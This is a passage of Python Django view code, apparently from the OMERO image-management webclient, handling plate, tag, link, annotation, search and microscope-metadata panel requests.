page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
screen_id = get_long_or_default(request, 'id', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the plates
plates = tree.marshal_plates(conn=conn,
screen_id=screen_id,
group_id=group_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'plates': plates})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
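    """ Get a list of plate acquisitions (runs) for the plate given by 'id'.
    The plate id is required since orphaned plate acquisitions are not
    possible.
    """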
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
plate_id = get_long_or_default(request, 'id', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# Orphaned PlateAcquisitions are not possible so querying without a
# plate is an error
if plate_id is None:
return HttpResponseBadRequest('id (plate) must be specified')
try:
# Get the plate acquisitions
plate_acquisitions = tree.marshal_plate_acquisitions(
conn=conn, plate_id=plate_id, page=page, limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'acquisitions': plate_acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
""" This is just used internally by api_link DELETE below """
if parent_type == 'orphaned':
return None
link_type = None
if parent_type == 'experimenter':
if child_type in ['dataset', 'plate', 'tag']:
            # Removal of this link is requested when a dataset or plate is
            # moved out of the de facto orphaned datasets/plates. It isn't
            # an error, but no link actually needs removing
return None
elif parent_type == 'project':
if child_type == 'dataset':
link_type = 'ProjectDatasetLink'
elif parent_type == 'dataset':
if child_type == 'image':
link_type = 'DatasetImageLink'
elif parent_type == 'screen':
if child_type == 'plate':
link_type = 'ScreenPlateLink'
elif parent_type == 'tagset':
if child_type == 'tag':
link_type = 'AnnotationAnnotationLink'
if not link_type:
raise Http404("json data needs 'parent_type' and 'child_type'")
params = omero.sys.ParametersI()
params.addIds(child_ids)
qs = conn.getQueryService()
# Need to fetch child and parent, otherwise
# AnnotationAnnotationLink is not loaded
q = """
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:ids)
""" % link_type
if parent_id:
params.add('pid', rlong(parent_id))
q += " and olink.parent.id = :pid"
res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
if parent_id is not None and len(res) == 0:
raise Http404("No link found for %s-%s to %s-%s"
% (parent_type, parent_id, child_type, child_ids))
return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
""" This is just used internally by api_link DELETE below """
if parent_type == 'experimenter':
if child_type == 'dataset' or child_type == 'plate':
# This is actually not a link that needs creating, this
# dataset/plate is an orphan
return 'orphan'
if parent_type == 'project':
project = ProjectI(long(parent_id), False)
if child_type == 'dataset':
dataset = DatasetI(long(child_id), False)
l = ProjectDatasetLinkI()
l.setParent(project)
l.setChild(dataset)
return l
elif parent_type == 'dataset':
dataset = DatasetI(long(parent_id), False)
if child_type == 'image':
image = ImageI(long(child_id), False)
l = DatasetImageLinkI()
l.setParent(dataset)
l.setChild(image)
return l
elif parent_type == 'screen':
screen = ScreenI(long(parent_id), False)
if child_type == 'plate':
plate = PlateI(long(child_id), False)
l = ScreenPlateLinkI()
l.setParent(screen)
l.setChild(plate)
return l
elif parent_type == 'tagset':
if child_type == 'tag':
l = AnnotationAnnotationLinkI()
l.setParent(TagAnnotationI(long(parent_id), False))
l.setChild(TagAnnotationI(long(child_id), False))
return l
return None
@login_required()
def api_links(request, conn=None, **kwargs):
"""
Entry point for the api_links methods.
We delegate depending on request method to
create or delete links between objects.
"""
# Handle link creation/deletion
json_data = json.loads(request.body)
if request.method == 'POST':
return _api_links_POST(conn, json_data)
elif request.method == 'DELETE':
return _api_links_DELETE(conn, json_data)
def _api_links_POST(conn, json_data, **kwargs):
""" Creates links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    When creating a link, fails silently on ValidationException
    (e.g. adding an image to a Dataset that already contains that image).
"""
response = {'success': False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
linksToSave = []
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
for child_id in child_ids:
parent_id = int(parent_id)
link = create_link(parent_type, parent_id,
child_type, child_id)
if link and link != 'orphan':
linksToSave.append(link)
if len(linksToSave) > 0:
# Need to set context to correct group (E.g parent group)
ptype = parent_type.title()
if ptype in ["Tagset", "Tag"]:
ptype = "TagAnnotation"
p = conn.getQueryService().get(ptype, parent_id,
conn.SERVICE_OPTS)
conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
logger.info("api_link: Saving %s links" % len(linksToSave))
try:
# We try to save all at once, for speed.
conn.saveArray(linksToSave)
response['success'] = True
except:
logger.info("api_link: Exception on saveArray with %s links"
% len(linksToSave))
# If this fails, e.g. ValidationException because link
# already exists, try to save individual links
for l in linksToSave:
try:
conn.saveObject(l)
except:
pass
response['success'] = True
return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
""" Deletes links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
"""
response = {'success': False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
objLnks = get_object_links(conn, parent_type,
parent_id,
child_type,
child_ids)
if objLnks is None:
continue
linkType, links = objLnks
linkIds = [r.id.val for r in links]
logger.info("api_link: Deleting %s links" % len(linkIds))
conn.deleteObjects(linkType, linkIds)
# webclient needs to know what is orphaned
linkType, remainingLinks = get_object_links(conn,
parent_type,
None,
child_type,
child_ids)
# return remaining links in same format as json above
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for rl in remainingLinks:
pid = rl.parent.id.val
cid = rl.child.id.val
# Deleting links still in progress above - ignore these
if pid == int(parent_id):
continue
if parent_type not in response:
response[parent_type] = {}
if pid not in response[parent_type]:
response[parent_type][pid] = {child_type: []}
response[parent_type][pid][child_type].append(cid)
# If we got here, DELETE was OK
response['success'] = True
return JsonResponse(response)
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
"""
This finds the paths to objects in the hierarchy. It returns only
the path, not the object hierarchy itself.
An example usage is for the 'show' functionality
Example to go to the image with id 1 somewhere in the tree.
http://localhost:8000/webclient/?show=image-1
This method can tell the webclient exactly what needs to be
dynamically loaded to display this in the jstree.
"""
try:
experimenter_id = get_long_or_default(request, 'experimenter', None)
project_id = get_long_or_default(request, 'project', None)
dataset_id = get_long_or_default(request, 'dataset', None)
image_id = get_long_or_default(request, 'image', None)
screen_id = get_long_or_default(request, 'screen', None)
plate_id = get_long_or_default(request, 'plate', None)
acquisition_id = get_long_or_default(request, 'run', None)
# acquisition will override 'run' if both are specified as they are
# the same thing
acquisition_id = get_long_or_default(request, 'acquisition',
acquisition_id)
well_id = request.GET.get('well', None)
tag_id = get_long_or_default(request, 'tag', None)
tagset_id = get_long_or_default(request, 'tagset', None)
group_id = get_long_or_default(request, 'group', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
if tag_id is not None or tagset_id is not None:
paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
else:
paths = paths_to_object(conn, experimenter_id, project_id,
dataset_id, image_id, screen_id, plate_id,
acquisition_id, well_id, group_id)
return JsonResponse({'paths': paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
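    """ Delegate to the GET or DELETE handler below, depending on the
    request method.
    """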
if request.method == 'GET':
return api_tags_and_tagged_list_GET(request, conn, **kwargs)
elif request.method == 'DELETE':
return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
    ''' Get a list of tags
        Specifying tag_id will return any sub-tags, sub-tagsets and
        objects tagged with that id.
        If no tag_id is specified it will return tags which have no
        parent.
    '''
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
tag_id = get_long_or_default(request, 'id', None)
experimenter_id = get_long_or_default(request, 'experimenter_id', -1)
orphaned = get_bool_or_default(request, 'orphaned', False)
load_pixels = get_bool_or_default(request, 'sizeXYZ', False)
date = get_bool_or_default(request, 'date', False)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get ALL data (all owners) under specified tags
if tag_id is not None:
tagged = tree.marshal_tagged(conn=conn,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
load_pixels=load_pixels,
date=date,
limit=limit)
else:
tagged = {}
# Get 'tags' under tag_id
tagged['tags'] = tree.marshal_tags(conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(tagged)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
''' Delete the listed tags by ids
'''
# Get parameters
try:
tag_ids = get_longs(request, 'id')
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
dcs = list()
handle = None
try:
for tag_id in tag_ids:
dcs.append(omero.cmd.Delete('/Annotation', tag_id))
doall = omero.cmd.DoAll()
doall.requests = dcs
handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
try:
conn._waitOnCmd(handle)
finally:
handle.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse('')
@login_required()
def api_annotations(request, conn=None, **kwargs):
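    """ Get annotations for the objects specified in the query string,
    e.g. ?image=1&image=2. An optional 'type' parameter filters by
    annotation type (e.g. 'tag'). Returns the annotations and the
    experimenters who own them.
    """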
r = request.GET
image_ids = r.getlist('image')
dataset_ids = r.getlist('dataset')
project_ids = r.getlist('project')
screen_ids = r.getlist('screen')
plate_ids = r.getlist('plate')
run_ids = r.getlist('acquisition')
well_ids = r.getlist('well')
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
ann_type = r.get('type', None)
anns, exps = tree.marshal_annotations(conn, project_ids=project_ids,
dataset_ids=dataset_ids,
image_ids=image_ids,
screen_ids=screen_ids,
plate_ids=plate_ids,
run_ids=run_ids,
well_ids=well_ids,
ann_type=ann_type,
page=page,
limit=limit)
return JsonResponse({'annotations': anns, 'experimenters': exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
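    """ Get lists of shares and discussions, optionally filtered by
    'member_id' and/or 'owner_id', with pagination via 'page' and 'limit'.
    """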
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
member_id = get_long_or_default(request, 'member_id', -1)
owner_id = get_long_or_default(request, 'owner_id', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# Like with api_container_list, this is a combination of
# results which will each be able to return up to the limit in page
# size
try:
# Get the shares
shares = tree.marshal_shares(conn=conn,
member_id=member_id,
owner_id=owner_id,
page=page,
limit=limit)
# Get the discussions
discussions = tree.marshal_discussions(conn=conn,
member_id=member_id,
owner_id=owner_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'shares': shares, 'discussions': discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
"""
This loads data for the center panel, via AJAX calls.
    Used for Plates & Plate Acquisitions ('runs').
"""
# get index of the plate
index = getIntOrDefault(request, 'index', 0)
# prepare data. E.g. kw = {} or {'plate': 301L} or
# 'acquisition': 301L}
kw = dict()
if o1_type is not None:
if o1_id is not None and o1_id > 0:
kw[str(o1_type)] = long(o1_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError, x:
return handlerInternalError(request, x)
# prepare forms
form_well_index = None
context = {
'manager': manager,
'form_well_index': form_well_index,
'index': index}
# load data & template
template = None
if 'plate' in kw or 'acquisition' in kw:
fields = manager.getNumberOfFields()
if fields is not None:
form_well_index = WellIndexForm(
initial={'index': index, 'range': fields})
if index == 0:
index = fields[0]
# Show parameter will be well-1|well-2
show = request.REQUEST.get('show')
if show is not None:
wells_to_select = []
for w in show.split("|"):
if 'well-' in w:
wells_to_select.append(w.replace('well-', ''))
context['select_wells'] = ','.join(wells_to_select)
context['baseurl'] = reverse('webgateway').rstrip('/')
context['form_well_index'] = form_well_index
context['index'] = index
template = "webclient/data/plate.html"
context['isLeader'] = conn.isLeader()
context['template'] = template
return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
"""
Get the potential groups we can move selected data to.
    These will be groups that the owner(s) of the selected objects are
    members of.
Objects are specified by query string like: ?Image=1,2&Dataset=3
If no selected objects are specified, simply list the groups that the
current user is a member of.
Groups list will exclude the 'current' group context.
"""
ownerIds = []
currentGroups = set()
groupSets = []
groups = {}
owners = {}
for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
oids = request.GET.get(dtype, None)
if oids is not None:
for o in conn.getObjects(dtype, oids.split(",")):
ownerIds.append(o.getDetails().owner.id.val)
currentGroups.add(o.getDetails().group.id.val)
ownerIds = list(set(ownerIds))
# In case we were passed no objects or they weren't found
if len(ownerIds) == 0:
ownerIds = [conn.getUserId()]
for owner in conn.getObjects("Experimenter", ownerIds):
# Each owner has a set of groups
gids = []
owners[owner.id] = owner.getFullName()
for group in owner.copyGroupExperimenterMap():
groups[group.parent.id.val] = group.parent
gids.append(group.parent.id.val)
groupSets.append(set(gids))
# Can move to groups that all owners are members of...
targetGroupIds = set.intersection(*groupSets)
# ...but not 'user' group
userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
targetGroupIds.remove(userGroupId)
# if all the Objects are in a single group, exclude it from the target
# groups
if len(currentGroups) == 1:
targetGroupIds.remove(currentGroups.pop())
def getPerms(group):
p = group.getDetails().permissions
return {
'write': p.isGroupWrite(),
'annotate': p.isGroupAnnotate(),
'read': p.isGroupRead()}
# From groupIds, create a list of group dicts for json
targetGroups = []
for gid in targetGroupIds:
targetGroups.append({
'id': gid,
'name': groups[gid].name.val,
'perms': getPerms(groups[gid])
})
targetGroups.sort(key=lambda x: x['name'])
owners = [[k, v] for k, v in owners.items()]
return {'owners': owners, 'groups': targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
""" Loads a tree for user to pick target Project, Dataset or Screen """
# filter by group (not switching group)
conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
owner = getIntOrDefault(request, 'owner', None)
manager = BaseContainer(conn)
manager.listContainerHierarchy(owner)
template = 'webclient/data/chgrp_target_tree.html'
context = {
'manager': manager,
'target_type': target_type,
'template': template}
return context
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
"""
Handles AJAX calls to search
"""
manager = BaseSearch(conn)
foundById = []
# form = 'form' if we are searching. Get query from request...
r = request.GET or request.POST
if form is not None:
query_search = r.get('query').replace("+", " ")
template = "webclient/search/search_details.html"
onlyTypes = r.getlist("datatype")
fields = r.getlist("field")
searchGroup = r.get('searchGroup', None)
ownedBy = r.get('ownedBy', None)
useAcquisitionDate = toBoolean(r.get('useAcquisitionDate'))
startdate = r.get('startdateinput', None)
startdate = startdate is not None and smart_str(startdate) or None
enddate = r.get('enddateinput', None)
enddate = enddate is not None and smart_str(enddate) or None
date = None
if startdate is not None:
if enddate is None:
n = datetime.datetime.now()
enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
date = "%s_%s" % (startdate, enddate)
# by default, if user has not specified any types:
if len(onlyTypes) == 0:
onlyTypes = ['images']
# search is carried out and results are stored in
# manager.containers.images etc.
manager.search(query_search, onlyTypes, fields, searchGroup, ownedBy,
useAcquisitionDate, date)
# if the query is only numbers (separated by commas or spaces)
# we search for objects by ID
isIds = re.compile('^[\d ,]+$')
if isIds.search(query_search) is not None:
conn.SERVICE_OPTS.setOmeroGroup(-1)
idSet = set()
for queryId in re.split(' |,', query_search):
if len(queryId) == 0:
continue
try:
searchById = long(queryId)
if searchById in idSet:
continue
idSet.add(searchById)
for t in onlyTypes:
t = t[0:-1] # remove 's'
if t in ('project', 'dataset', 'image', 'screen',
'plate'):
obj = conn.getObject(t, searchById)
if obj is not None:
foundById.append({'otype': t, 'obj': obj})
except ValueError:
pass
else:
# simply display the search home page.
template = "webclient/search/search.html"
context = {
'manager': manager,
'foundById': foundById,
'resultCount': manager.c_size + len(foundById)}
context['template'] = template
return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None,
**kwargs):
"""
This page is the right-hand panel 'general metadata', first tab only.
Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
The data and annotations are loaded by the manager. Display of appropriate
data is handled by the template.
"""
context = dict()
# we only expect a single object, but forms can take multiple objects
images = (c_type == "image" and
list(conn.getObjects("Image", [c_id])) or
list())
datasets = (c_type == "dataset" and
list(conn.getObjects("Dataset", [c_id])) or list())
projects = (c_type == "project" and
list(conn.getObjects("Project", [c_id])) or list())
screens = (c_type == "screen" and
list(conn.getObjects("Screen", [c_id])) or
list())
plates = (c_type == "plate" and
list(conn.getObjects("Plate", [c_id])) or list())
acquisitions = (c_type == "acquisition" and
list(conn.getObjects("PlateAcquisition", [c_id])) or
list())
shares = ((c_type == "share" or c_type == "discussion") and
[conn.getShare(c_id)] or list())
wells = (c_type == "well" and
list(conn.getObjects("Well", [c_id])) or list())
# we simply set up the annotation form, passing the objects to be
# annotated.
selected = {
'images': c_type == "image" and [c_id] or [],
'datasets': c_type == "dataset" and [c_id] or [],
'projects': c_type == "project" and [c_id] or [],
'screens': c_type == "screen" and [c_id] or [],
'plates': c_type == "plate" and [c_id] or [],
'acquisitions': c_type == "acquisition" and [c_id] or [],
'wells': c_type == "well" and [c_id] or [],
'shares': ((c_type == "share" or c_type == "discussion") and [c_id] or
[])}
initial = {
'selected': selected, 'images': images, 'datasets': datasets,
'projects': projects, 'screens': screens, 'plates': plates,
'acquisitions': acquisitions, 'wells': wells, 'shares': shares}
form_comment = None
figScripts = None
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
form_comment = CommentAnnotationForm(initial=initial)
else:
try:
manager = BaseContainer(
conn, **{str(c_type): long(c_id)})
except AttributeError, x:
return handlerInternalError(request, x)
if share_id is not None:
template = "webclient/annotations/annotations_share.html"
context['share'] = BaseShare(conn, share_id)
else:
template = "webclient/annotations/metadata_general.html"
context['canExportAsJpg'] = manager.canExportAsJpg(request)
figScripts = manager.listFigureScripts()
context['manager'] = manager
if c_type in ("tag", "tagset"):
context['insight_ns'] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET).val
if form_comment is not None:
context['form_comment'] = form_comment
context['figScripts'] = figScripts
context['template'] = template
context['webclient_path'] = reverse('webindex')
return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None,
**kwargs):
"""
This is the image 'Preview' tab for the right-hand panel.
"""
context = {}
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
if share_id:
context['share'] = BaseShare(conn, share_id)
allRdefs = manager.image.getAllRenderingDefs()
rdefs = {}
rdefId = manager.image.getRenderingDefId()
# remove duplicates per user
for r in allRdefs:
ownerId = r['owner']['id']
r['current'] = r['id'] == rdefId
# if duplicate rdefs for user, pick one with highest ID
if ownerId not in rdefs or rdefs[ownerId]['id'] < r['id']:
rdefs[ownerId] = r
rdefs = rdefs.values()
# format into rdef strings,
# E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
rdefQueries = []
for r in rdefs:
chs = []
for i, c in enumerate(r['c']):
act = "-"
if c['active']:
act = ""
color = c['lut'] if 'lut' in c else c['color']
reverse = 'r' if c['reverseIntensity'] else '-r'
chs.append('%s%s|%d:%d%s$%s'
% (act, i+1, c['start'], c['end'], reverse, color))
rdefQueries.append({
'id': r['id'],
'owner': r['owner'],
'c': ",".join(chs),
'm': r['model'] == 'greyscale' and 'g' or 'c'
})
context['manager'] = manager
context['rdefsJson'] = json.dumps(rdefQueries)
context['rdefs'] = rdefs
context['template'] = "webclient/annotations/metadata_preview.html"
return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
"""
This loads the ancestors of the specified object and displays them in a
static tree.
Used by an AJAX call from the metadata_general panel.
"""
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
context = {'manager': manager}
context['template'] = "webclient/annotations/metadata_hierarchy.html"
return context
@login_required()
@render_response()
def load_metadata_acquisition(request, c_type, c_id, conn=None, share_id=None,
**kwargs):
"""
The acquisition tab of the right-hand panel. Only loaded for images.
TODO: urls regex should make sure that c_type is only 'image' OR 'well'
"""
try:
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
else:
template = "webclient/annotations/metadata_acquisition.html"
manager = BaseContainer(
conn, **{str(c_type): long(c_id)})
except AttributeError, x:
return handlerInternalError(request, x)
form_environment = None
form_objective = None
form_microscope = None
form_instrument_objectives = list()
form_stageLabel = None
form_filters = list()
form_dichroics = list()
form_detectors = list()
form_channels = list()
form_lasers = list()
lasertypes = list(conn.getEnumerationEntries("LaserType"))
arctypes = list(conn.getEnumerationEntries("ArcType"))
filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
# various enums we need for the forms (don't load unless needed)
mediums = None
immersions = None
corrections = None
if c_type == 'image':
if share_id is None:
manager.companionFiles()
manager.channelMetadata()
for theC, ch in enumerate(manager.channel_metadata):
logicalChannel = ch.getLogicalChannel()
if logicalChannel is not None:
channel = dict()
channel['form'] = MetadataChannelForm(initial={
'logicalChannel': logicalChannel,
'exWave': ch.getExcitationWave(units=True),
'emWave': ch.getEmissionWave(units=True),
'illuminations': list(conn.getEnumerationEntries(
"IlluminationI")),
'contrastMethods': list(conn.getEnumerationEntries(
"ContrastMethodI")),
'modes': list(conn.getEnumerationEntries(
"AcquisitionModeI"))})
# 9853 Much metadata is not available to 'shares'
if share_id is None:
lightPath = logicalChannel.getLightPath()
if lightPath is not None:
channel['form_dichroic'] = None
channel['form_excitation_filters'] = list()
channel['form_emission_filters'] = list()
lightPathDichroic = lightPath.getDichroic()
if lightPathDichroic is not None:
channel['form_dichroic'] = MetadataDichroicForm(
initial={'dichroic': lightPathDichroic})
filterTypes = list(conn.getEnumerationEntries(
"FilterTypeI"))
for f in lightPath.getEmissionFilters():
channel['form_emission_filters'].append(
MetadataFilterForm(initial={
'filter': f, 'types': filterTypes}))
for f in lightPath.getExcitationFilters():
channel['form_excitation_filters'].append(
MetadataFilterForm(initial={
'filter': f, 'types': filterTypes}))
detectorSettings = logicalChannel.getDetectorSettings()
if (detectorSettings._obj is not None and
detectorSettings.getDetector()):
channel['form_detector_settings'] = \
MetadataDetectorForm(initial={
'detectorSettings': detectorSettings,
'detector': detectorSettings.getDetector(),
'types': list(conn.getEnumerationEntries(
"DetectorTypeI")),
'binnings': list(conn.getEnumerationEntries(
"Binning"))})
lightSourceSettings = \
logicalChannel.getLightSourceSettings()
if (lightSourceSettings is not None and
lightSourceSettings._obj is not None):
lightSrc = lightSourceSettings.getLightSource()
if lightSrc is not None:
lstypes = lasertypes
if lightSrc.OMERO_CLASS == "Arc":
lstypes = arctypes
elif lightSrc.OMERO_CLASS == "Filament":
lstypes = filamenttypes
channel['form_light_source'] = \
MetadataLightSourceForm(initial={
'lightSource': lightSrc,
'lightSourceSettings': lightSourceSettings,
'lstypes': lstypes,
'mediums': list(
conn.getEnumerationEntries(
"LaserMediumI")),
'pulses': list(conn.getEnumerationEntries(
"PulseI"))})
# TODO: We don't display filter sets here yet since they are
# not populated on Import by BioFormats.
channel['label'] = ch.getLabel()
color = ch.getColor()
channel['color'] = (color is not None and color.getHtml() or
None)
planeInfo = (
manager.image and
manager.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0))
plane_info = []
for pi in planeInfo:
deltaT = pi.getDeltaT(units="SECOND")
exposure = pi.getExposureTime(units="SECOND")
if deltaT is None and exposure is None:
continue
if deltaT is not None:
deltaT = deltaT.getValue()
if exposure is not None:
exposure = exposure.getValue()
plane_info.append({
'theT': pi.theT,
'deltaT': deltaT,
'exposureTime': exposure})
channel['plane_info'] = plane_info
form_channels.append(channel)
try:
image = manager.well.getWellSample().image()
except:
image = manager.image
if share_id is None: # 9853
if image.getObjectiveSettings() is not None:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(
conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(
conn.getEnumerationEntries("CorrectionI"))
form_objective = MetadataObjectiveSettingsForm(initial={
'objectiveSettings': image.getObjectiveSettings(),
'objective': image.getObjectiveSettings().getObjective(),
'mediums': mediums,
'immersions': immersions,
'corrections': corrections})
if image.getImagingEnvironment() is not None:
form_environment = MetadataEnvironmentForm(initial={
'image': image})
if image.getStageLabel() is not None:
form_stageLabel = MetadataStageLabelForm(initial={
'image': image})
instrument = image.getInstrument()
if instrument is not None:
if instrument.getMicroscope() is not None:
form_microscope = MetadataMicroscopeForm(initial={
'microscopeTypes': list(
conn.getEnumerationEntries("MicroscopeTypeI")),
'microscope': instrument.getMicroscope()})
objectives = instrument.getObjectives()
for o in objectives:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(
conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(
conn.getEnumerationEntries("CorrectionI"))
obj_form = MetadataObjectiveForm(initial={
'objective': o,
'mediums': mediums,
'immersions': immersions,
'corrections': corrections})
form_instrument_objectives.append(obj_form)
filters = list(instrument.getFilters())
if len(filters) > 0:
for f in filters:
form_filter = MetadataFilterForm(initial={
'filter': f, 'types': list(
conn.getEnumerationEntries("FilterTypeI"))})
form_filters.append(form_filter)
dichroics = list(instrument.getDichroics())
for d in dichroics:
form_dichroic = MetadataDichroicForm(
initial={'dichroic': d})
form_dichroics.append(form_dichroic)
detectors = list(instrument.getDetectors())
if len(detectors) > 0:
for d in detectors:
form_detector = MetadataDetectorForm(initial={
'detectorSettings': None,
'detector': d,
'types': list(
conn.getEnumerationEntries("DetectorTypeI"))})
form_detectors.append(form_detector)
lasers = list(instrument.getLightSources())
if len(lasers) > 0:
for l in lasers:
lstypes = lasertypes
if l.OMERO_CLASS == "Arc":
lstypes = arctypes
elif l.OMERO_CLASS == "Filament":
lstypes = filamenttypes
form_laser = MetadataLightSourceForm(initial={
'lightSource': l,
'lstypes': lstypes,
'mediums': list(
conn.getEnumerationEntries("LaserMediumI")),
'pulses': list(
conn.getEnumerationEntries("PulseI"))})
form_lasers.append(form_laser)
# TODO: remove this 'if' since we should only have c_type = 'image'?
context = {'manager': manager, "share_id": share_id}
if c_type not in ("share", "discussion", "tag"):
context['form_channels'] = form_channels
context['form_environment'] = form_environment
context['form_objective'] = form_objective
context['form_microscope'] = form_microscope
context['form_instrument_objectives'] = form_instrument_objectives
context['form_filters'] = form_filters
context['form_dichroics'] = form_dichroics
context['form_detectors'] = form_detectors
context['form_lasers'] = form_lasers
context['form_stageLabel'] = form_stageLabel
context['template'] = template
return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None,
**kwargs):
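    """
    Loads the raw Original Metadata for an image, for display in the
    right-hand panel.
    """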
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
context = {
'template': 'webclient/annotations/original_metadata.html',
'imageId': image.getId()}
try:
om = image.loadOriginalMetadata()
if om is not None:
context['original_metadata'] = om[0]
context['global_metadata'] = om[1]
context['series_metadata'] = om[2]
except omero.LockTimeout:
# 408 is Request Timeout
return HttpResponse(content='LockTimeout', status=408)
return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
"""
Prepare objects for use in the annotation forms.
These objects are required by the form superclass to populate hidden
fields, so we know what we're annotating on submission
"""
r = request.GET or request.POST
images = (
len(r.getlist('image')) > 0 and
list(conn.getObjects("Image", r.getlist('image'))) or
list())
datasets = (
len(r.getlist('dataset')) > 0 and
list(conn.getObjects(
"Dataset", r.getlist('dataset'))) or
list())
projects = (
len(r.getlist('project')) > 0 and
list(conn.getObjects(
"Project", r.getlist('project'))) or
list())
screens = (
len(r.getlist('screen')) > 0 and
list(conn.getObjects("Screen", r.getlist('screen'))) or
list())
plates = (
len(r.getlist('plate')) > 0 and
